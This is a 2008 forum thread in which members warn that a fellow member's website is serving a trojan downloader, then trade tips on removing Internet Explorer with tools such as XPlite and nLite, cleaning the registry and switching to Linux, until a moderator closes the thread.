One or more of the ads have or could have an iframe in the code, or someone hosting this web server has shit security (i.e. MD hosting).
If that is the case they can read your emails, the data base everything...and include code in the index.php to insert an Iframe...should be all encrypted in a long hash..

One more thing..

Get mint Linux or Ubuntu Linux and run the cd from boot up..it will start Linux without installing it, you can use the disk manager to erase the MBR and backup the user folder (including program settings) from windows should you choose to re-install it. If not install mint or Ubuntu and have a great trouble free PC....
Title: Re: Trojan Alert
Post by: atlantex on January 29, 2008, 01:30:29 AM
Hello,

Mr. TT's website seems to be also infected now with a trojan downloader, so careful please!   >:(

http://www.trawoeger-pyramide.info



atlantex
Title: Re: Trojan Alert
Post by: hansvonlieven on January 29, 2008, 02:06:23 AM
Can someone tell me please how I can get rid of IE Explorer. I don't want it on my machine but I don't seem to be able to get rid of it.

Hans von Lieven
Title: Re: Trojan Alert
Post by: Freezer on January 29, 2008, 02:12:25 AM
Quote from: hansvonlieven on January 29, 2008, 02:06:23 AM
Can someone tell me please how I can get rid of IE Explorer. I don't want it on my machine but I don't seem to be able to get rid of it.

Hans von Lieven

I don't think you can get rid of it, as it's integrated with Windows.  Just don't use IE and no problems.
Title: Re: Trojan Alert
Post by: Bessler007 on January 29, 2008, 02:22:21 AM
Hello Hans,

http://reviews.cnet.com/4520-10166_7-6219945-1.html


Quote: There is a way to remove Internet Explorer from Windows, but it's not worth the hassle. Whether or not you realize it, you actually do need IE; it's used throughout Windows. For example, Outlook, Word, Windows Explorer--basically any apps that need to render HTML--all rely on IE to some degree. If you remove IE, which requires editing your system registry files (something I don't recommend unless you have experience and a good backup first), you'll then have to associate these apps with another Web rendering product in order to view, for example, HTML-enabled e-mail. Not impossible, but I'm sure you have better use for your time. Instead, simply drag and drop your IE icon to the trash and just forget about it.

Load linux.  I'm using Ubuntu and booting from a cd.

Hope that helps.


Bessler007
Title: Re: Trojan Alert
Post by: Bessler007 on January 29, 2008, 02:26:27 AM
Quote from: wattsup on January 12, 2008, 01:31:30 AM
. . .

I was at the damn US patent site that only really works with IE, and without thinking I browsed here instead of with my regular Firefox.
. . .

www.freepatentsonline.com/
works with Mozilla/Firefox.

Bessler007
Title: Re: Trojan Alert
Post by: hansvonlieven on January 29, 2008, 02:48:48 AM
I have dropped the shortcuts and icons associated with IE a long time ago into the bin but it still keeps running in the background at times

Hans von Lieven
Title: Re: Trojan Alert
Post by: wattsup on January 29, 2008, 07:28:33 AM
I use XPlite at http://www.litepc.com to remove all Windows programs I do not want on my computer. I had kept IE because when you go to the USA patent web site,

http://www.uspto.gov/patft/index.html

images are not seen well in Firefox - shit. So I used IE. But now, no more. Finito IE.

Outlook Express and all other Windows communications programs are removed.

I use Eudora for E-mail. It's the best e-mail program around. Especially when you have different e-mail accounts.

All the best.
Title: Re: Trojan Alert
Post by: pese on January 29, 2008, 07:46:16 AM
Quote from: atlantex on January 29, 2008, 01:30:29 AM
Hello,

Mr. TT's website seems to be also infected now with a trojan downloader, so careful please!   >:(

http://www.trawoeger-pyramide.info



atlantex

Mozilla Explorer:

Access denied: Virus
Title: Re: Trojan Alert
Post by: hansvonlieven on January 29, 2008, 12:46:33 PM
Thanks Wattsup,

I have just downloaded XPLite. I was surprised as it is actually free for personal use. Sounds just the thing. Now I can get rid of all that cumbersome shit in windows I need like a hole in the head.

Thanks again, well done

Hans von Lieven
Title: Re: Trojan Alert
Post by: atlantex on January 29, 2008, 01:07:01 PM
Hello Hans,

better you install a good virus scanner than try to get rid of IE and destabilize your system with such actions.



Trojan-Downloader.HTML.Agent.ij

that's the enemy on TT's site.




atlantex
Title: Re: Trojan Alert
Post by: wattsup on January 29, 2008, 01:20:21 PM
@Hans

No prob.

May I recommend you do a system backup before you use xplite, then do another one after you have removed your unwantoms.

I am also putting up a copy of my RegCleaner program. It is an old version of 2001 but it is strong and great to use to clean up the system registry, start-up programs, etc. I will leave it here for a few days then remove it. The new version of this is called RegSupreme. When using this, check the StartUp List section. It should not be filled with programs being launched at computer start-up. My XP only has two lines that are relative to my high performance audio card and that's it. All other lines are removed.

If you go in Options, Registry CleanUP, OLE Cleaner then choose Extra Powerful.
Then go to Tools, Registry Cleanup, and choose Do them all. This will scan the complete registry and list all lines that are just junk. You then remove these. All removed items go to the Backups section. Keep these there for a few days just to make sure nothing went wrong. It never does, but hey, you're never too careful. You can then remove them from backup whenever. Any time you install a new program, check this program in the Start-Up to make sure it did not hog your resources at start-up. Also, if you go there and see a line, remove it, and it comes back on its own, this is a trojan or virus doing its mayhem. Ouch.

Enjoy the power and control.
Title: Re: Trojan Alert
Post by: Carl. on January 29, 2008, 02:56:03 PM
unfortunately it is part of the windows OS, so you cannot get rid of it unless you flush windows out of the PC and load something else like Linux.

Sorry. Only alternative to that is leave it alone but load firefox or another browser.
Title: Re: Trojan Alert
Post by: hansvonlieven on January 29, 2008, 04:00:21 PM
Sorry guys,

XPLite is not so free, if you want to get rid of Internet Explorer you have to buy the programme for 40 bucks.

Hans von Lieven
Title: Re: Trojan Alert
Post by: tak22 on January 29, 2008, 05:58:22 PM
I don't recommend XPlite, but if you must use something for IE, I'd go with nLite instead, as it's technically better, it's free, and it's well supported.

get it here  http://www.nliteos.com/ (http://www.nliteos.com/)

tak
Title: Re: Trojan Alert
Post by: hansvonlieven on January 29, 2008, 06:45:52 PM
Thanks Tak,

Downloading now.  ;D

Hans
Title: Re: Trojan Alert
Post by: hartiberlin on January 29, 2008, 07:14:03 PM
Okay, as this trojan issue is fixed,
I now close this thread.